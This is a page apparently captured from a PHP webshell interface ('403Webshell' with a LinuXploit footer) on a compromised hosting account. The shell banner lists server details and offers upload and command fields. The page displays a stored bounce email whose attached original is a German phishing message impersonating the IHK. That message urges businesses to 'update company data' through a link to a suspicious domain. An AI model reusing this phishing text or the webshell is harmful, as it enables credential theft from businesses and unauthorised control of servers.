403Webshell
Server IP : 66.29.132.122  /  Your IP : 18.190.153.213
Web Server : LiteSpeed
System : Linux business142.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : admazpex ( 531)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/admazpex/mail/englishtefl.admarooc.com/admin/cur/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/admazpex/mail/englishtefl.admarooc.com/admin/cur/1728864620.M601810P1848686.business142.web-hosting.com,S=14218,W=14515:2,
Return-Path: <>
Delivered-To: admin@englishtefl.admarooc.com
Received: from business142.web-hosting.com
	by business142.web-hosting.com with LMTP
	id gE5PI2xhDGduNRwAq/Tvug
	(envelope-from <>)
	for <admin@englishtefl.admarooc.com>; Sun, 13 Oct 2024 20:10:20 -0400
Return-path: <>
Envelope-to: admin@englishtefl.admarooc.com
Delivery-date: Sun, 13 Oct 2024 20:10:20 -0400
Received: from relay14.alfahosting-server.de ([109.237.142.228]:40613)
	by business142.web-hosting.com with esmtps  (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
	(Exim 4.96.2)
	id 1t08f9-007qNK-0J
	for admin@englishtefl.admarooc.com;
	Sun, 13 Oct 2024 20:10:20 -0400
Received: by relay01.alfahosting-server.de (Postfix)
	id EE935334BB28; Mon, 14 Oct 2024 01:57:29 +0200 (CEST)
Date: Mon, 14 Oct 2024 01:57:29 +0200 (CEST)
From: MAILER-DAEMON@relay01.alfahosting-server.de (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: admin@englishtefl.admarooc.com
Auto-Submitted: auto-replied
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
	boundary="B97F6334B84E.1728863849/relay01.alfahosting-server.de"
Message-Id: <20241013235729.EE935334BB28@relay01.alfahosting-server.de>
X-Spam-Status: No, score=0.1
X-Spam-Score: 1
X-Spam-Bar: /
X-Ham-Report: Spam detection software, running on the system "business142.web-hosting.com",
 has NOT identified this incoming email as spam.  The original
 message has been attached to this so you can view it or label
 similar future email.  If you have any questions, see
 root\@localhost for details.
 Content preview:  This is the mail system at host relay01.alfahosting-server.de.
    I'm sorry to have to inform you that your message could not be delivered
   to one or more recipients. It's attached below. For further assistance, please
    send mail to postmaster. 
 Content analysis details:   (0.1 points, 5.0 required)
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
  0.0 URIBL_BLOCKED          ADMINISTRATOR NOTICE: The query to URIBL was
                             blocked.  See
                             http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
                              for more information.
                             [URIs: 9935492.info]
  0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The
                             query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                           [109.237.142.228 listed in bl.score.senderscore.com]
  0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE:
                             The query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                             [109.237.142.228 listed in sa-accredit.habeas.com]
  0.1 URI_HEX                URI: URI hostname has long hexadecimal sequence
  0.0 HTML_MESSAGE           BODY: HTML included in message
  0.0 KAM_DMARC_STATUS       Test Rule for DKIM or SPF Failure with Strict
                             Alignment
X-Spam-Flag: NO

This is a MIME-encapsulated message.

--B97F6334B84E.1728863849/relay01.alfahosting-server.de
Content-Description: Notification
Content-Type: text/plain; charset=us-ascii

This is the mail system at host relay01.alfahosting-server.de.

I'm sorry to have to inform you that your message could not
be delivered to one or more recipients. It's attached below.

For further assistance, please send mail to postmaster.

If you do so, please include this problem report. You can
delete your own text from the attached returned message.

                   The mail system

<pension-sonnenleite@t-online.de>: host mx00.t-online.de[194.25.134.8] said:
    550-5.7.0 Message considered as spam or virus, rejected 550-5.7.0 Your IP:
    109.237.142.243 550-5.7.0 Mailhost: mailin23.mgt.mul.t-online.de 550-5.7.0
    Timestamp: 2024-10-13T23:57:29Z 550-5.7.0 Expurgate-ID:
    149288::1728863849-B77FDBAF-E0D435F8/3/8199238028 550-5.7.0 Authenticator:
    2E1017F286B5CD1910F45633B120443EE0AD9FB04B75067B44D4716307D698017632D58D
    550-5.7.0  550-5.7.0 Your message has been rejected due to spam or virus
    classification. 550-5.7.0 If you feel this is inapplicable, please report
    the above error codes 550-5.7.0 back to FPR@RX.T-ONLINE.DE to help us fix
    possible misclassification. 550-5.7.0 We apologize for any inconvenience
    and thank you for your assistance! 550-5.7.0  550-5.7.0 Die Annahme Ihrer
    Nachricht wurde abgelehnt, da sie als Spam oder 550-5.7.0 Virus eingestuft
    wurde. Sollten Sie dies als unzutreffend ansehen, 550-5.7.0 senden Sie
    bitte obige Fehlercodes an FPR@RX.T-ONLINE.DE, damit wir 550-5.7.0 die
    Klassifizierung untersuchen koennen. Wir entschuldigen uns fuer 550 5.7.0
    etwaige Unannehmlichkeiten und bedanken uns fuer Ihre Unterstuetzung! (in
    reply to end of DATA command)

--B97F6334B84E.1728863849/relay01.alfahosting-server.de
Content-Description: Delivery report
Content-Type: message/delivery-status

Reporting-MTA: dns; relay01.alfahosting-server.de
X-Postfix-Queue-ID: B97F6334B84E
X-Postfix-Sender: rfc822; admin@englishtefl.admarooc.com
Arrival-Date: Mon, 14 Oct 2024 01:57:27 +0200 (CEST)

Final-Recipient: rfc822; pension-sonnenleite@t-online.de
Action: failed
Status: 5.7.0
Remote-MTA: dns; mx00.t-online.de
Diagnostic-Code: smtp; 550-5.7.0 Message considered as spam or virus, rejected
    550-5.7.0 Your IP: 109.237.142.243 550-5.7.0 Mailhost:
    mailin23.mgt.mul.t-online.de 550-5.7.0 Timestamp: 2024-10-13T23:57:29Z
    550-5.7.0 Expurgate-ID: 149288::1728863849-B77FDBAF-E0D435F8/3/8199238028
    550-5.7.0 Authenticator:
    2E1017F286B5CD1910F45633B120443EE0AD9FB04B75067B44D4716307D698017632D58D
    550-5.7.0  550-5.7.0 Your message has been rejected due to spam or virus
    classification. 550-5.7.0 If you feel this is inapplicable, please report
    the above error codes 550-5.7.0 back to FPR@RX.T-ONLINE.DE to help us fix
    possible misclassification. 550-5.7.0 We apologize for any inconvenience
    and thank you for your assistance! 550-5.7.0  550-5.7.0 Die Annahme Ihrer
    Nachricht wurde abgelehnt, da sie als Spam oder 550-5.7.0 Virus eingestuft
    wurde. Sollten Sie dies als unzutreffend ansehen, 550-5.7.0 senden Sie
    bitte obige Fehlercodes an FPR@RX.T-ONLINE.DE, damit wir 550-5.7.0 die
    Klassifizierung untersuchen koennen. Wir entschuldigen uns fuer 550 5.7.0
    etwaige Unannehmlichkeiten und bedanken uns fuer Ihre Unterstuetzung!

--B97F6334B84E.1728863849/relay01.alfahosting-server.de
Content-Description: Undelivered Message
Content-Type: message/rfc822

Return-Path: <admin@englishtefl.admarooc.com>
Received: by relay01.alfahosting-server.de (Postfix, from userid 1001)
	id B97F6334B84E; Mon, 14 Oct 2024 01:57:29 +0200 (CEST)
X-Spam-DCC: : 
X-Spam-Level: 
X-Spam-Status: No, score=-0.7 required=7.0 tests=BAYES_00,HTML_MESSAGE,
	NUMERIC_HTTP_ADDR,URIBL_SBL,URI_HEX autolearn=disabled version=3.2.5
Received: from alfa3102.alfahosting-server.de (alfa3102.alfahosting-server.de [109.237.132.28])
	by relay01.alfahosting-server.de (Postfix) with ESMTPS id AEF77334BB28
	for <pension-sonnenleite@t-online.de>; Mon, 14 Oct 2024 01:57:27 +0200 (CEST)
Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=162.0.232.66; helo=business142-m.web-hosting.com; envelope-from=admin@englishtefl.admarooc.com; receiver=<UNKNOWN> 
X-Greylist: delayed 1191 seconds by postgrey-1.35 at alfa3102; Mon, 14 Oct 2024 01:57:27 CEST
Received: from business142-m.web-hosting.com (business142-m.web-hosting.com [162.0.232.66])
	by alfa3102.alfahosting-server.de (Postfix) with ESMTPS id 3EC853600BA0
	for <info@pension-sonnenleite.de>; Mon, 14 Oct 2024 01:57:27 +0200 (CEST)
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed;
	d=englishtefl.admarooc.com; s=default; h=Content-Type:MIME-Version:Date:
	Subject:To:From:Message-ID:Sender:Reply-To:Cc:Content-Transfer-Encoding:
	Content-ID:Content-Description:Resent-Date:Resent-From:Resent-Sender:
	Resent-To:Resent-Cc:Resent-Message-ID:In-Reply-To:References:List-Id:
	List-Help:List-Unsubscribe:List-Subscribe:List-Post:List-Owner:List-Archive;
	bh=v+fa0cpJ+Qhv0tPredPG6llPhbs/8yB/BxcBoQh4Mp4=; b=YYaCc14mEPA1wngXu60+bxG0S3
	/9LKaAfiBMWf2D7Dr7enDSYTj/+YDIaOri02krGm0bmDpFOR+SmRExSqbAcDX0m9gujySH8hvBeG/
	YpzKjdUZ+MPe/O8luvyeBvhV+fqHIRSl3P/EkFuumV2j1PR55tEBRNGn02YG2cYZxLk88jQVC3l61
	PtqCBy75CuT4VcTidrb6AYNPId1uJ3mTe5iTim2FgeLOAQlf5FekgwAwi3U9yExTvlwBOGedELtvn
	vc1sEymzUE7sKvg+xAVAAOaGvRtpuN7V0xgTfMBAmI4k+oyT8d1Vv8NmFohKfFwFbIv+9Nl6j27KK
	o/x9CtEw==;
Received: from [172.56.225.147] (port=55399 helo=185-21-60-181.hosted-by-worldstream.net)
	by business142.web-hosting.com with esmtpsa  (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
	(Exim 4.96.2)
	(envelope-from <admin@englishtefl.admarooc.com>)
	id 1t089S-007UKB-2x
	for info@pension-sonnenleite.de;
	Sun, 13 Oct 2024 19:37:32 -0400
Message-ID: <8c1af52eda1e35597ad40da6528ee4eef9dfa1d7@englishtefl.admarooc.com>
From: IHK <admin@englishtefl.admarooc.com>
To: info@pension-sonnenleite.de
Subject: Letzte Erinnerung: Aktualisieren Sie jetzt Ihre Unternehmensdaten zur Identifizierung
Date: Sun, 13 Oct 2024 16:37:00 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="202069c23794beb102a8e152e6233de99ac0"
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - business142.web-hosting.com
X-AntiAbuse: Original Domain - pension-sonnenleite.de
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - englishtefl.admarooc.com
X-Get-Message-Sender-Via: business142.web-hosting.com: authenticated_id: admin@englishtefl.admarooc.com
X-Authenticated-Sender: business142.web-hosting.com: admin@englishtefl.admarooc.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
X-From-Rewrite: unmodified, already matched

--202069c23794beb102a8e152e6233de99ac0
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: quoted-printable

IHK

Wichtige Aktualisierung Ihrer Unternehmensdaten

Sehr geehrte Damen und Herren,

Unsere Aufzeichnungen zeigen, dass Ihre Unternehmensdaten nicht mehr auf =
dem neuesten Stand sind. Um weiterhin von unseren Dienstleistungen zu pro=
fitieren und sicherzustellen, dass alle Mitteilungen Sie rechtzeitig erre=
ichen, bitten wir Sie, Ihre Daten f=C3=BCr das Jahr 2024 zu aktualisieren=
.

Bitte nutzen Sie die nachfolgende Schaltfl=C3=A4che, um Ihre Daten schnel=
l und einfach zu =C3=BCberpr=C3=BCfen und anzupassen:

Daten aktualisieren

Ihre Mithilfe ist von gro=C3=9Fer Bedeutung, um sicherzustellen, dass all=
e relevanten Informationen korrekt und auf dem neuesten Stand sind. Sollt=
en Sie Fragen haben, stehen wir Ihnen gerne zur Verf=C3=BCgung.

Mit freundlichen Gr=C3=BC=C3=9Fen,
Ihre Industrie- und Handelskammer (IHK)

=C2=A9 2024 IHK. Alle Rechte vorbehalten.
Besuchen Sie unsere Website

--202069c23794beb102a8e152e6233de99ac0
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable

<html><head>
<meta charset=3D"utf-8">
<meta name=3Dviewport content=3D"width=3Ddevice-width, initial-scale=3D1.=
0">
<style type=3D"text/css">BODY {
	FONT-FAMILY: Arial, sans-serif; COLOR: #333333; PADDING-BOTTOM: 0px; PAD=
DING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BACKGR=
OUND-COLOR: #ffffff
}
.container {
	MAX-WIDTH: 800px; BORDER-TOP: #e5e5e5 1px solid; BORDER-RIGHT: #e5e5e5 1=
px solid; BORDER-BOTTOM: #e5e5e5 1px solid; PADDING-BOTTOM: 20px; PADDING=
-TOP: 20px; PADDING-LEFT: 20px; BORDER-LEFT: #e5e5e5 1px solid; MARGIN: 0=
px auto; PADDING-RIGHT: 20px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1)
}
.header-bar {
	FONT-SIZE: 24px; FONT-WEIGHT: bold; COLOR: white; PADDING-BOTTOM: 20px; =
PADDING-TOP: 20px; PADDING-LEFT: 20px; PADDING-RIGHT: 20px; BACKGROUND-CO=
LOR: #0056b3
}
H1 {
	FONT-SIZE: 24px; COLOR: #0056b3
}
.content {
	MARGIN-TOP: 20px; PADDING-BOTTOM: 20px; PADDING-TOP: 20px; PADDING-LEFT:=
 20px; PADDING-RIGHT: 20px; BACKGROUND-COLOR: #f5f5f5
}
.button {
	TEXT-DECORATION: none; MARGIN-TOP: 20px; FONT-WEIGHT: bold; COLOR: white=
; PADDING-BOTTOM: 15px; PADDING-TOP: 15px; PADDING-LEFT: 30px; DISPLAY: i=
nline-block; PADDING-RIGHT: 30px; BACKGROUND-COLOR: #0091ff; border-radiu=
s: 5px
}
.button:hover {
	BACKGROUND-COLOR: #007acc
}
footer {
	FONT-SIZE: 12px; MARGIN-TOP: 40px; COLOR: #777777; PADDING-BOTTOM: 20px;=
 PADDING-TOP: 20px; PADDING-LEFT: 20px; PADDING-RIGHT: 20px; BACKGROUND-C=
OLOR: #f5f5f5
}
footer A {
	TEXT-DECORATION: none; COLOR: #0056b3
}
footer A:hover {
	TEXT-DECORATION: underline
}
</style>

<meta name=3DGENERATOR content=3D"-[OUTLOOK_VER]-"></head>
<body>
<div class=3Dheader-bar>IHK</div>
<h1 class=3Dcontainer>Wichtige Aktualisierung Ihrer Unternehmensdaten</h1=
>
<div class=3Dcontent>
<p>Sehr geehrte Damen und Herren,</p>
<p>Unsere Aufzeichnungen zeigen, dass Ihre Unternehmensdaten nicht mehr a=
uf dem neuesten Stand sind. Um weiterhin von unseren Dienstleistungen zu =
profitieren und sicherzustellen, dass alle Mitteilungen Sie rechtzeitig e=
rreichen, bitten wir Sie, Ihre Daten f=C3=BCr das Jahr 2024 zu aktualisie=
ren.</p>
<p>Bitte nutzen Sie die nachfolgende Schaltfl=C3=A4che, um Ihre Daten sch=
nell und einfach zu =C3=BCberpr=C3=BCfen und anzupassen:</p>
<p style=3D"TEXT-ALIGN: center"><a class=3Dbutton href=3D"https://9935492=
.info">Daten aktualisieren</a></p>
<p>Ihre Mithilfe ist von gro=C3=9Fer Bedeutung, um sicherzustellen, dass =
alle relevanten Informationen korrekt und auf dem neuesten Stand sind. So=
llten Sie Fragen haben, stehen wir Ihnen gerne zur Verf=C3=BCgung.</p>
<p>Mit freundlichen Gr=C3=BC=C3=9Fen,<br>Ihre Industrie- und Handelskamme=
r (IHK)</p></div><footer>
<p>=C2=A9 2024 IHK. Alle Rechte vorbehalten.<br><a href=3D"https://google=
.de">Besuchen Sie unsere Website</a></p></footer></body></html>

--202069c23794beb102a8e152e6233de99ac0--

--B97F6334B84E.1728863849/relay01.alfahosting-server.de--

Youez - 2016 - github.com/yon3zu
LinuXploit